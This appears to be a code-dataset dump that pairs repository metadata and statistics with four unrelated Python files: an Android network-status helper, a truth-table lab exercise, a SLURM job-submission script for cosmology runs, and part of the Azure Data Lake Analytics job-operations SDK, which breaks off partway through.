| 0
| 0.129412
| 85
| 2
| 44
| 42.5
| 0.891892
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
3bb6c1a166bef5ff6590728e58cdfd2b3592a070
| 1,250
|
py
|
Python
|
kvdroid/tools/network.py
|
kengoon/Kvdroid
|
a47ab614079b70f81031c2e16a2a04fba1d39677
|
[
"MIT"
] | 1
|
2021-03-23T08:04:22.000Z
|
2021-03-23T08:04:22.000Z
|
kvdroid/tools/network.py
|
kengoon/Kvdroid
|
a47ab614079b70f81031c2e16a2a04fba1d39677
|
[
"MIT"
] | null | null | null |
kvdroid/tools/network.py
|
kengoon/Kvdroid
|
a47ab614079b70f81031c2e16a2a04fba1d39677
|
[
"MIT"
] | null | null | null |
from kvdroid.jclass.android import Activity
from kvdroid import activity


def network_status():
    # True if either a Wi-Fi or a mobile-data connection is up or coming up.
    from kvdroid.jclass.android import ConnectivityManager
    ConnectivityManager = ConnectivityManager()  # resolve the lazy jclass wrapper to the Java class
    con_mgr = activity.getSystemService(Activity().CONNECTIVITY_SERVICE)
    try:
        return con_mgr.getNetworkInfo(ConnectivityManager.TYPE_WIFI).isConnectedOrConnecting()
    except Exception:  # no Wi-Fi network registered: fall back to mobile data
        try:
            return con_mgr.getNetworkInfo(ConnectivityManager.TYPE_MOBILE).isConnectedOrConnecting()
        except Exception:
            return False


def wifi_status():
    # True only for an active (or connecting) Wi-Fi network.
    from kvdroid.jclass.android import ConnectivityManager
    ConnectivityManager = ConnectivityManager()
    con_mgr = activity.getSystemService(Activity().CONNECTIVITY_SERVICE)
    try:
        return con_mgr.getNetworkInfo(ConnectivityManager.TYPE_WIFI).isConnectedOrConnecting()
    except Exception:
        return False


def mobile_status():
    # True only for an active (or connecting) mobile-data network.
    from kvdroid.jclass.android import ConnectivityManager
    ConnectivityManager = ConnectivityManager()
    con_mgr = activity.getSystemService(Activity().CONNECTIVITY_SERVICE)
    try:
        return con_mgr.getNetworkInfo(ConnectivityManager.TYPE_MOBILE).isConnectedOrConnecting()
    except Exception:
        return False
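A small usage sketch for the helpers above (hypothetical; they only work inside a running python-for-android app, where kvdroid's `activity` is bound to the Android activity):

if network_status():
    via = "wifi" if wifi_status() else "mobile data"
    print("online via", via)
else:
    print("offline")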
| 36.764706
| 100
| 0.7464
| 110
| 1,250
| 8.327273
| 0.218182
| 0.045852
| 0.074236
| 0.104803
| 0.94214
| 0.89083
| 0.89083
| 0.89083
| 0.89083
| 0.89083
| 0
| 0
| 0.1872
| 1,250
| 33
| 101
| 37.878788
| 0.901575
| 0
| 0
| 0.827586
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.103448
| false
| 0
| 0.172414
| 0
| 0.517241
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
3bf39160d270e85b87c028a1a56b4c833f35561e
| 4,337
|
py
|
Python
|
3-semester/programming/lab3.py
|
Rakleed/rgpu
|
47ab2a05a8398c15be7e41e9e98fafe5c2a36627
|
[
"MIT"
] | null | null | null |
3-semester/programming/lab3.py
|
Rakleed/rgpu
|
47ab2a05a8398c15be7e41e9e98fafe5c2a36627
|
[
"MIT"
] | null | null | null |
3-semester/programming/lab3.py
|
Rakleed/rgpu
|
47ab2a05a8398c15be7e41e9e98fafe5c2a36627
|
[
"MIT"
] | null | null | null |
"""
Author: Pavel Moiseenko, group No. 1, subgroup No. 2.
Task: print the truth tables for and, or, xor, and equality.
The tables are drawn with the "*" character; the int and bool inputs are converted to strings, and the results of conjunction, disjunction, exclusive disjunction, and equivalence are printed.
"""
logical_false = 0
logical_true = 1
delimiter = "*"
space_symbol = " "
header = "* A *" + "* B *" + "* " + " A and B " + "*"
table_width = len(header)
# print (logical_A and logical_B)
print(delimiter * table_width)
print(header)
print(delimiter * table_width)
inp_str = "* " + str(logical_true) + " ** " + str(logical_true) + " *"
res1 = "* " + str(int((bool(logical_true) and bool(logical_true)))) + " *"
print(inp_str + res1)
print(delimiter * table_width)
inp_str = "* " + str(logical_true) + " ** " + str(logical_false) + " *"
res2 = "* " + str(int((bool(logical_true) and bool(logical_false)))) + " *"
print(inp_str + res2)
print(delimiter * table_width)
inp_str = "* " + str(logical_false) + " ** " + str(logical_true) + " *"
res3 = "* " + str(int((bool(logical_false) and bool(logical_true)))) + " *"
print(inp_str + res3)
print(delimiter * table_width)
inp_str = "* " + str(logical_false) + " ** " + str(logical_false) + " *"
res4 = "* " + str(int((bool(logical_false) and bool(logical_false)))) + " *"
print(inp_str + res4)
print(delimiter * table_width)
header = "* A *" + "* B *" + "* " + " A or B " + "*"
# print (logical_A or logical_B)
print("\n" + delimiter * table_width)
print(header)
print(delimiter * table_width)
inp_str = "* " + str(logical_true) + " ** " + str(logical_true) + " *"
res1 = "* " + str(int((bool(logical_true) or bool(logical_true)))) + " *"
print(inp_str + res1)
print(delimiter * table_width)
inp_str = "* " + str(logical_true) + " ** " + str(logical_false) + " *"
res2 = "* " + str(int((bool(logical_true) or bool(logical_false)))) + " *"
print(inp_str + res2)
print(delimiter * table_width)
inp_str = "* " + str(logical_false) + " ** " + str(logical_true) + " *"
res3 = "* " + str(int((bool(logical_false) or bool(logical_true)))) + " *"
print(inp_str + res3)
print(delimiter * table_width)
inp_str = "* " + str(logical_false) + " ** " + str(logical_false) + " *"
res4 = "* " + str(int((bool(logical_false) or bool(logical_false)))) + " *"
print(inp_str + res4)
print(delimiter * table_width)
header = "* A *" + "* B *" + "* " + " A xor B " + "*"
# print (logical_A xor logical_B)
print("\n" + delimiter * table_width)
print(header)
print(delimiter * table_width)
inp_str = "* " + str(logical_true) + " ** " + str(logical_true) + " *"
res1 = "* " + str(int((bool(logical_true) ^ bool(logical_true)))) + " *"
print(inp_str + res1)
print(delimiter * table_width)
inp_str = "* " + str(logical_true) + " ** " + str(logical_false) + " *"
res2 = "* " + str(int((bool(logical_true) ^ bool(logical_false)))) + " *"
print(inp_str + res2)
print(delimiter * table_width)
inp_str = "* " + str(logical_false) + " ** " + str(logical_true) + " *"
res3 = "* " + str(int((bool(logical_false) ^ bool(logical_true)))) + " *"
print(inp_str + res3)
print(delimiter * table_width)
inp_str = "* " + str(logical_false) + " ** " + str(logical_false) + " *"
res4 = "* " + str(int((bool(logical_false) ^ bool(logical_false)))) + " *"
print(inp_str + res4)
print(delimiter * table_width)
header = "* A *" + "* B *" + "* " + " A == B " + "*"
# print (logical_A == logical_B)
print("\n" + delimiter * table_width)
print(header)
print(delimiter * table_width)
inp_str = "* " + str(logical_true) + " ** " + str(logical_true) + " *"
res1 = "* " + str(int((bool(logical_true) == bool(logical_true)))) + " *"
print(inp_str + res1)
print(delimiter * table_width)
inp_str = "* " + str(logical_true) + " ** " + str(logical_false) + " *"
res2 = "* " + str(int((bool(logical_true) == bool(logical_false)))) + " *"
print(inp_str + res2)
print(delimiter * table_width)
inp_str = "* " + str(logical_false) + " ** " + str(logical_true) + " *"
res3 = "* " + str(int((bool(logical_false) == bool(logical_true)))) + " *"
print(inp_str + res3)
print(delimiter * table_width)
inp_str = "* " + str(logical_false) + " ** " + str(logical_false) + " *"
res4 = "* " + str(int((bool(logical_false) == bool(logical_false)))) + " *"
print(inp_str + res4)
print(delimiter * table_width)
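The four tables differ only in the operator applied, so the same truth values can be produced by one loop. A compact alternative sketch (illustrative, not the lab's required form; row padding is simplified), reusing the names defined above:

operations = [
    ("A and B", lambda a, b: a and b),
    ("A or B", lambda a, b: a or b),
    ("A xor B", lambda a, b: a ^ b),
    ("A == B", lambda a, b: a == b),
]
for title, operation in operations:
    table_header = "* A ** B ** " + title + " *"
    print(table_header)
    print(delimiter * len(table_header))
    for a in (logical_true, logical_false):
        for b in (logical_true, logical_false):
            # Same truth values as the tables above, one row per input pair.
            print("* " + str(a) + " ** " + str(b) + " ** " + str(int(operation(bool(a), bool(b)))) + " *")
            print(delimiter * len(table_header))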
| 34.696
| 158
| 0.611944
| 553
| 4,337
| 4.567812
| 0.103074
| 0.15677
| 0.180523
| 0.199525
| 0.852336
| 0.852336
| 0.852336
| 0.852336
| 0.841251
| 0.841251
| 0
| 0.010161
| 0.183076
| 4,337
| 124
| 159
| 34.975806
| 0.701665
| 0.091769
| 0
| 0.705882
| 0
| 0
| 0.085313
| 0
| 0.047059
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.517647
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 10
|
ce314602c07ee9296c566b5ad7d82c1855a5da59
| 8,004
|
py
|
Python
|
cluster/submit_firas.py
|
andrea0292/Dark-Photon-Perturbations
|
7b54172176da5629b200b0bc5f8e93e7407c5a8d
|
[
"MIT"
] | 1
|
2020-08-24T22:20:46.000Z
|
2020-08-24T22:20:46.000Z
|
cluster/submit_firas.py
|
andrea0292/Dark-Photon-Perturbations
|
7b54172176da5629b200b0bc5f8e93e7407c5a8d
|
[
"MIT"
] | null | null | null |
cluster/submit_firas.py
|
andrea0292/Dark-Photon-Perturbations
|
7b54172176da5629b200b0bc5f8e93e7407c5a8d
|
[
"MIT"
] | 1
|
2021-04-21T09:21:21.000Z
|
2021-04-21T09:21:21.000Z
|
import sys, os
import random
import numpy as np
sys.path.append("../")
from grf.units import *
batch='''#!/bin/bash
#SBATCH -N 1 # node count
#SBATCH --ntasks-per-node=1
#SBATCH -t 10:00:00
#SBATCH --mem=4GB
##SBATCH --mail-type=begin
##SBATCH --mail-type=end
##SBATCH --mail-user=sm8383@nyu.edu
cd /home/sm8383/spectral_distortions_perturbations/cluster
conda activate
'''
# Main set of plots
for pdf in ["gaussian", "lognormal", "log_analytic_pdf_interp"]:
for pspec_tag in ["franken_lower", "franken_upper"]:
for one_plus_delta_bound in [-1, 1e2, 1e4]:
for z_min in [1e-3, 20]:
for z_excise_max in [20, 30]:
for b in [1, 1.5]:
for pixie in [0, 1]:
if (b != 1) and pdf != "lognormal":
continue
tag = "pdf_" + pdf + "_" + pspec_tag + "_cut_" + str(one_plus_delta_bound) + "_pixie_" + str(pixie) +'_z_min_' + str(z_min) + '_z_excise_max_' + str(z_excise_max)
if pdf == "lognormal":
tag += '_b_' + str(b)
batchn = batch + "\n"
batchn += "python firas_interface.py --pdf " + pdf + " --tag " + tag + " --pspec_tag " + pspec_tag + " --one_plus_delta_bound " + str(one_plus_delta_bound) + " --pixie " + str(pixie) + " --z_min " + str(z_min) + " --z_excise_max " + str(z_excise_max) + " --b " + str(b)
fname = "batch/submit.batch"
f=open(fname, "w")
f.write(batchn)
f.close()
os.system("chmod +x " + fname)
os.system("sbatch " + fname)
# Homogeneous plots
for pixie in [0, 1]:
tag = "homo_pixie_" + str(pixie)
batchn = batch + "\n"
batchn += "python firas_interface.py --homo 1 --tag " + tag + " --pixie " + str(pixie)
fname = "batch/submit.batch"
f=open(fname, "w")
f.write(batchn)
f.close()
os.system("chmod +x " + fname)
os.system("sbatch " + fname)
# Run voids
for pdf in ["voids"]:
for pspec_tag in ["franken_lower"]:
for one_plus_delta_bound in [-1, 1e2]:
for z_min in [1e-3, 20]:
for z_excise_max in [20, 30]:
for b in [1]:
for pixie in [0]:
if (b != 1) and pdf != "lognormal":
continue
tag = "pdf_" + pdf + "_" + pspec_tag + "_cut_" + str(one_plus_delta_bound) + "_pixie_" + str(pixie) +'_z_min_' + str(z_min) + '_z_excise_max_' + str(z_excise_max)
if pdf == "lognormal":
tag += '_b_' + str(b)
batchn = batch + "\n"
batchn += "python firas_interface.py --pdf " + pdf + " --tag " + tag + " --pspec_tag " + pspec_tag + " --one_plus_delta_bound " + str(one_plus_delta_bound) + " --pixie " + str(pixie) + " --z_min " + str(z_min) + " --z_excise_max " + str(z_excise_max) + " --b " + str(b)
fname = "batch/submit.batch"
f=open(fname, "w")
f.write(batchn)
f.close()
os.system("chmod +x " + fname)
os.system("sbatch " + fname)
# Run more 1 + delta cuts
for pdf in ["lognormal", "log_analytic_pdf_interp"]:
for pspec_tag in ["franken_lower", "franken_upper"]:
for one_plus_delta_bound in [10, 1e3, 1e5]:
for z_min in [1e-3]:
for z_excise_max in [20]:
for b in [1]:
for pixie in [0]:
if (b != 1) and pdf != "lognormal":
continue
if (pspec_tag == "franken_upper") and (pdf == "log_analytic_pdf_interp"):
continue
tag = "pdf_" + pdf + "_" + pspec_tag + "_cut_" + str(one_plus_delta_bound) + "_pixie_" + str(pixie) +'_z_min_' + str(z_min) + '_z_excise_max_' + str(z_excise_max)
if pdf == "lognormal":
tag += '_b_' + str(b)
batchn = batch + "\n"
batchn += "python firas_interface.py --pdf " + pdf + " --tag " + tag + " --pspec_tag " + pspec_tag + " --one_plus_delta_bound " + str(one_plus_delta_bound) + " --pixie " + str(pixie) + " --z_min " + str(z_min) + " --z_excise_max " + str(z_excise_max) + " --b " + str(b)
fname = "batch/submit.batch"
f=open(fname, "w")
f.write(batchn)
f.close()
os.system("chmod +x " + fname)
os.system("sbatch " + fname)
# Run more z_min values
for pdf in ["lognormal"]:
for pspec_tag in ["franken_lower", "franken_upper"]:
for one_plus_delta_bound in [1e2]:
for z_min in [1e-3, 1e-2, 1e-1, 1]:
for z_excise_max in [20]:
for b in [1]:
for pixie in [0]:
if (b != 1) and pdf != "lognormal":
continue
if (pspec_tag == "franken_upper") and (pdf == "log_analytic_pdf_interp"):
continue
tag = "pdf_" + pdf + "_" + pspec_tag + "_cut_" + str(one_plus_delta_bound) + "_pixie_" + str(pixie) +'_z_min_' + str(z_min) + '_z_excise_max_' + str(z_excise_max)
if pdf == "lognormal":
tag += '_b_' + str(b)
batchn = batch + "\n"
batchn += "python firas_interface.py --pdf " + pdf + " --tag " + tag + " --pspec_tag " + pspec_tag + " --one_plus_delta_bound " + str(one_plus_delta_bound) + " --pixie " + str(pixie) + " --z_min " + str(z_min) + " --z_excise_max " + str(z_excise_max) + " --b " + str(b)
fname = "batch/submit.batch"
f=open(fname, "w")
f.write(batchn)
f.close()
os.system("chmod +x " + fname)
os.system("sbatch " + fname)
# Run over a wider mass
for pdf in ["lognormal"]:
for pspec_tag in ["franken_lower", "franken_upper"]:
for one_plus_delta_bound in [1e2]:
for z_min in [1e-3, 20]:
for z_excise_max in [20]:
for b in [1]:
for pixie in [0, 1]:
if (b != 1) and pdf != "lognormal":
continue
tag = "widemass_1_pdf_" + pdf + "_" + pspec_tag + "_cut_" + str(one_plus_delta_bound) + "_pixie_" + str(pixie) +'_z_min_' + str(z_min) + '_z_excise_max_' + str(z_excise_max)
if pdf == "lognormal":
tag += '_b_' + str(b)
batchn = batch + "\n"
batchn += "python firas_interface.py --widemass 1 --pdf " + pdf + " --tag " + tag + " --pspec_tag " + pspec_tag + " --one_plus_delta_bound " + str(one_plus_delta_bound) + " --pixie " + str(pixie) + " --z_min " + str(z_min) + " --z_excise_max " + str(z_excise_max) + " --b " + str(b)
fname = "batch/submit.batch"
f=open(fname, "w")
f.write(batchn)
f.close()
os.system("chmod +x " + fname)
os.system("sbatch " + fname)
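The write-and-submit block is repeated verbatim in all five sweeps above; a hypothetical refactoring sketch that also replaces `os.system` with checked subprocess calls:

import subprocess

def submit(batch_text, fname="batch/submit.batch"):
    # Write the generated batch script, mark it executable, and queue it.
    with open(fname, "w") as f:
        f.write(batch_text)
    subprocess.run(["chmod", "+x", fname], check=True)
    subprocess.run(["sbatch", fname], check=True)

# Each sweep body above then reduces to: submit(batchn)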
| 46.265896
| 310
| 0.444528
| 919
| 8,004
| 3.5963
| 0.125136
| 0.031467
| 0.075643
| 0.102874
| 0.861725
| 0.858094
| 0.846899
| 0.846899
| 0.826626
| 0.826626
| 0
| 0.020598
| 0.423788
| 8,004
| 173
| 311
| 46.265896
| 0.69601
| 0.014118
| 0
| 0.769231
| 0
| 0
| 0.220066
| 0.035895
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.030769
| 0
| 0.030769
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ce404d09af046ff8cc5e92c1bf55a3f774d27bb9
| 34,735
|
py
|
Python
|
sdk/datalake/azure-mgmt-datalake-analytics/azure/mgmt/datalake/analytics/job/operations/job_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 2,728
|
2015-01-09T10:19:32.000Z
|
2022-03-31T14:50:33.000Z
|
sdk/datalake/azure-mgmt-datalake-analytics/azure/mgmt/datalake/analytics/job/operations/job_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 17,773
|
2015-01-05T15:57:17.000Z
|
2022-03-31T23:50:25.000Z
|
sdk/datalake/azure-mgmt-datalake-analytics/azure/mgmt/datalake/analytics/job/operations/job_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 1,916
|
2015-01-19T05:05:41.000Z
|
2022-03-31T19:36:44.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrest.polling import LROPoller, NoPolling
from msrestazure.polling.arm_polling import ARMPolling
from .. import models
class JobOperations(object):
"""JobOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: Client Api Version. Constant value: "2017-09-01-preview".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2017-09-01-preview"
self.config = config
def list(
self, account_name, filter=None, top=None, skip=None, select=None, orderby=None, count=None, custom_headers=None, raw=False, **operation_config):
"""Lists the jobs, if any, associated with the specified Data Lake
Analytics account. The response includes a link to the next page of
results, if any.
:param account_name: The Azure Data Lake Analytics account to execute
job operations on.
:type account_name: str
:param filter: OData filter. Optional.
:type filter: str
:param top: The number of items to return. Optional.
:type top: int
:param skip: The number of items to skip over before returning
elements. Optional.
:type skip: int
:param select: OData Select statement. Limits the properties on each
entry to just those requested, e.g.
Categories?$select=CategoryName,Description. Optional.
:type select: str
:param orderby: OrderBy clause. One or more comma-separated
expressions with an optional "asc" (the default) or "desc" depending
on the order you'd like the values sorted, e.g.
Categories?$orderby=CategoryName desc. Optional.
:type orderby: str
:param count: The Boolean value of true or false to request a count of
the matching resources included with the resources in the response,
e.g. Categories?$count=true. Optional.
:type count: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of JobInformationBasic
:rtype:
~azure.mgmt.datalake.analytics.job.models.JobInformationBasicPaged[~azure.mgmt.datalake.analytics.job.models.JobInformationBasic]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = self.list.metadata['url']
path_format_arguments = {
'accountName': self._serialize.url("account_name", account_name, 'str', skip_quote=True),
'adlaJobDnsSuffix': self._serialize.url("self.config.adla_job_dns_suffix", self.config.adla_job_dns_suffix, 'str', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
if top is not None:
query_parameters['$top'] = self._serialize.query("top", top, 'int', minimum=1)
if skip is not None:
query_parameters['$skip'] = self._serialize.query("skip", skip, 'int', minimum=1)
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, 'str')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, 'str')
if count is not None:
query_parameters['$count'] = self._serialize.query("count", count, 'bool')
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.JobInformationBasicPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.JobInformationBasicPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
list.metadata = {'url': '/jobs'}
def create(
self, account_name, job_identity, parameters, custom_headers=None, raw=False, **operation_config):
"""Submits a job to the specified Data Lake Analytics account.
:param account_name: The Azure Data Lake Analytics account to execute
job operations on.
:type account_name: str
:param job_identity: Job identifier. Uniquely identifies the job
across all jobs submitted to the service.
:type job_identity: str
:param parameters: The parameters to submit a job.
:type parameters:
~azure.mgmt.datalake.analytics.job.models.CreateJobParameters
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: JobInformation or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.datalake.analytics.job.models.JobInformation or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.create.metadata['url']
path_format_arguments = {
'accountName': self._serialize.url("account_name", account_name, 'str', skip_quote=True),
'adlaJobDnsSuffix': self._serialize.url("self.config.adla_job_dns_suffix", self.config.adla_job_dns_suffix, 'str', skip_quote=True),
'jobIdentity': self._serialize.url("job_identity", job_identity, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'CreateJobParameters')
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('JobInformation', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create.metadata = {'url': '/jobs/{jobIdentity}'}
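# Hedged usage sketch (illustrative, not part of the generated source):
# submitting a U-SQL job via the synchronous `create` above. The model
# classes come from azure.mgmt.datalake.analytics.job.models; the GUID,
# account name and script are placeholders.
#
#     import uuid
#     from azure.mgmt.datalake.analytics.job.models import (
#         CreateJobParameters, CreateUSqlJobProperties, JobType)
#     params = CreateJobParameters(
#         name='example-job', type=JobType.usql,
#         properties=CreateUSqlJobProperties(script='@a = SELECT * FROM ...;'))
#     job = client.job.create('myadlaaccount', str(uuid.uuid4()), params)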
def get(
self, account_name, job_identity, custom_headers=None, raw=False, **operation_config):
"""Gets the job information for the specified job ID.
:param account_name: The Azure Data Lake Analytics account to execute
job operations on.
:type account_name: str
:param job_identity: JobInfo ID.
:type job_identity: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: JobInformation or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.datalake.analytics.job.models.JobInformation or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get.metadata['url']
path_format_arguments = {
'accountName': self._serialize.url("account_name", account_name, 'str', skip_quote=True),
'adlaJobDnsSuffix': self._serialize.url("self.config.adla_job_dns_suffix", self.config.adla_job_dns_suffix, 'str', skip_quote=True),
'jobIdentity': self._serialize.url("job_identity", job_identity, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('JobInformation', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get.metadata = {'url': '/jobs/{jobIdentity}'}
def _update_initial(
self, account_name, job_identity, parameters=None, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.update.metadata['url']
path_format_arguments = {
'accountName': self._serialize.url("account_name", account_name, 'str', skip_quote=True),
'adlaJobDnsSuffix': self._serialize.url("self.config.adla_job_dns_suffix", self.config.adla_job_dns_suffix, 'str', skip_quote=True),
'jobIdentity': self._serialize.url("job_identity", job_identity, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
if parameters is not None:
body_content = self._serialize.body(parameters, 'UpdateJobParameters')
else:
body_content = None
# Construct and send request
request = self._client.patch(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200, 201, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('JobInformation', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update(
self, account_name, job_identity, parameters=None, custom_headers=None, raw=False, polling=True, **operation_config):
"""Updates the job information for the specified job ID. (Only for use
internally with Scope job type.).
:param account_name: The Azure Data Lake Analytics account to execute
job operations on.
:type account_name: str
:param job_identity: Job identifier. Uniquely identifies the job
across all jobs submitted to the service.
:type job_identity: str
:param parameters: The parameters to update a job.
:type parameters:
~azure.mgmt.datalake.analytics.job.models.UpdateJobParameters
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns JobInformation or
ClientRawResponse<JobInformation> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.datalake.analytics.job.models.JobInformation]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.datalake.analytics.job.models.JobInformation]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._update_initial(
account_name=account_name,
job_identity=job_identity,
parameters=parameters,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('JobInformation', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
update.metadata = {'url': '/jobs/{jobIdentity}'}
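# Hedged usage sketch: `update` wraps `_update_initial` in an LROPoller.
# The three accepted `polling` values are shown below; `client`, `acct`,
# `job_id` and `upd` are placeholders.
#
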